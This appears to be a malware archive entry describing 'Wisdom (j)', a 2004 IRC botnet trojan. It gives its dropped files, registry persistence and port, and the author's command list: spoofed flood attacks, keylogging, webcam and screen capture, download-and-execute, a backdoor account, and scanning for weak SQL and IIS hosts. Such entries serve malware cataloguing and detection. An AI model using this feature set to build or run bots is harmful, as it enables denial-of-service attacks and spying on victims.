Wisdom (j)

Released 20 years, 10 months ago. March 2004

Copyright © MegaSecurity

By ?


Informations
Author ?
Family Wisdom
Category Remote Access
Version Wisdom (j)
Released Date Mar 2004, 20 years, 10 months ago.
Language C++, compressed with UPX, source included
Additional Information
dropped file:
c:\WINNT\RUNDLL16.EXE  size: 16.896 bytes 
c:\WINNT\temp.bat      size: 92 bytes 

port: 559 TCP

startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows DLL Loader"
data: C:\WINNT\RUNDLL16.EXE 

tested on Win2000

Author Information / Description
*Fixed; Nick length bug that caused some bots not to connect
 *Fixed; chankey support, didnt really have to do anything..(line 236, numbers only, you can easily make it alpha too but im not telling how, figure it the fuck out)
 *Enabled; bot creates a backdoor account on the box, find it and comment it out to turn it off
 
  
commands:
  "*" beside a command means it isnt working correctly
  *NOTE* MAKE SURE YOU PUT IN CORRECT PARAMATERS, AS THE BOT MAY CRASH IF YOU DONT
  1)  ! version - request version of bot
  2)  ! moo - exit bot
  3)  ! spoof get - get current spoof address
  4)  ! spoof off - disable spoofing from ip, only spoof from current subnet (default)
  5)  ! spoof <ip> - set spoofing to an ip address (this can be used for example with ping, to create a smurf attack, or a syn flood to create a drdos attack)
  6)  ! icmp <ip> <time> - sends random icmp codes to an ip address for an allotted time (512 byte packets + spoofing)
  7)  ! ack <ip> <port> <time> - attacks an ip with ack packets (spoofing, VERY fast sending)
  8)  ! syn <ip> <port> <time> - attacks an ip with syn packets (spoofing, TURBO fast sending)
  9)  ! random <ip> <port> <time> - alternates between syn/ack packets (spoofing, REALLY fast sending)
  10) ! enable <password> - attempts to enable commands on the bot, the password is what you set with the disable command
  11) ! disable <password> - if bot is enabled, disables it, and sets the enable password
  12) ! udp <ip> <port> <time> - sends udp packets (spoofed) to an ip, if port = 0 then it uses random desination ports
  13) ! dns <ip/host> - resolve a host/ip
  14) ! exec <file> [command line] - opens a file (no spaces)
  15) ! uptime - get the system uptime
  16) ! keyspy enable <number between 0 to 15> - enable real time irc based keylogger, the number is used as the colour for the messages (easier to read with many bots)
  17) ! keyspy disable - disable real time irc keylogger
  18) ! delete <file> - delete a file off victims hard disk
  19) ! send <nick> <file> <send as> - sends a file to someone
  20) ! active - returns the active window (usefull if your looking for an interesting screen capture)
  21) ! capture screen <save as> - takes a screen shot
  22) ! capture drivers - list video for windows device(s)
  23) ! capture frame <save as> <index> <width> <height> - captures a frame (bitmap) from a video for windows device
  24) ! capture video <save as> <index> <time> <width> <height> - captures a video (avi) from a video for windows device
  25) ! pscan <subnet> <port> <type> [delay] - scan a subnet for open ports.. if type is 1 then subnet is X, if type is 2 then subnet is X.X, etc..
  26) ! sysinfo - gives you some info about the system
  27) ! raw <command> - sends a raw command to the server
  28) ! dload <http url> <file> [execute] - downloads a file, execute is a boolean of wether to execute
  29) ! clone load <server> <port> - loads 1 clone onto a server 
  30) ! clone kill - disconnects all clones
  31) ! clone raw <command> - sends a raw command to the server
  + you can dcc files to the bot
  + dcc chat console with basic file/process manager
  + socks4 server running on port 559
  + basic plugin system

to do:
  http request generator (banner clicking)
  find files command

notes:
  the port scanner can preform various actions based on what port you are scanning..
    - port 1433: it will auto check if the 'sa' account is present on an SQL server
    - port 80: it will auto check if the host is vulnerable to a version of the unicode IIS exploit

If you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.